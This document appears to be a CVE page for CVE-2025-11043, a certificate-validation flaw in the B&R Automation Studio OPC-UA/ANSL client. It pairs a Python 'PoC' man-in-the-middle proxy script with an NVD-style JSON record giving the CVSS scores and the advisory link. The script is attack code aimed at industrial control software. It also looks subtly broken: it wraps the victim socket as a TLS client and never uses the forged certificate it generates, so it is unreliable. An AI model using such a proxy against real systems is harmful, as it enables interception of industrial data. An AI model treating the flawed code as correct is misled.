CVE-2025-11043

# CVE-2025-11043 PoC - Certificate Validation Bypass # Target: B&R Automation Studio OPC-UA/ANSL Client # Environment: Network accessible to target import socket import ssl import struct from OpenSSL import crypto def generate_fake_certificate(): """Generate a self-signed certificate for MITM attack""" key = crypto.PKey() key.generate_key(crypto.TYPE_RSA, 2048) cert = crypto.X509() cert.get_subject().CN = "Target Server CN" cert.set_serial_number(1000) cert.gmtime_adj_notBefore(0) cert.gmtime_adj_notAfter(365*24*60*60) cert.set_pubkey(key) cert.sign(key, 'sha256') return cert, key def create_mitm_proxy(target_host, target_port, listen_port=4840): """Create MITM proxy for OPC-UA connection""" context = ssl.create_default_context() context.check_hostname = False # Bypass hostname verification context.verify_mode = ssl.CERT_NONE # Disable certificate verification server_context = ssl.create_default_context() mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) mitm_socket.bind(('0.0.0.0', listen_port)) mitm_socket.listen(5) print(f"[*] MITM Proxy listening on port {listen_port}") print(f"[*] Redirecting to {target_host}:{target_port}") while True: client_socket, addr = mitm_socket.accept() print(f"[+] Connection from {addr}") try: # Connect to legitimate server server_socket = socket.create_connection((target_host, target_port)) # Wrap with SSL (vulnerable context) secure_client = context.wrap_socket(client_socket, server_side=False) secure_server = server_context.wrap_socket(server_socket, server_side=False) # Forward traffic (intercept/modify as needed) while True: data = secure_client.recv(4096) if not data: break print(f"[*] Intercepted: {data.hex()}") secure_server.sendall(data) response = secure_server.recv(4096) secure_client.sendall(response) except Exception as e: print(f"[-] Error: {e}") finally: client_socket.close() server_socket.close() if __name__ == "__main__": # Usage: python cve-2025-11043-poc.py <target_ip> <target_port> import sys if len(sys.argv) < 3: print("Usage: python cve-2025-11043-poc.py <target_ip> <target_port>") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) create_mitm_proxy(target_ip, target_port)

{"cve": {"id": "CVE-2025-11043", "sourceIdentifier": "[email protected]", "published": "2026-01-19T16:15:52.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges."}, {"lang": "es", "value": "Una vulnerabilidad de validación de certificado incorrecta en el cliente OPC-UA y el cliente ANSL sobre TLS utilizada en versiones de Automation Studio anteriores a la 6.5 podría permitir a un atacante no autenticado en la red posicionarse para interceptar e interferir con los intercambios de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://www.br-automation.com/fileadmin/SA25P004-4f45197f.pdf", "source": "[email protected]"}]}}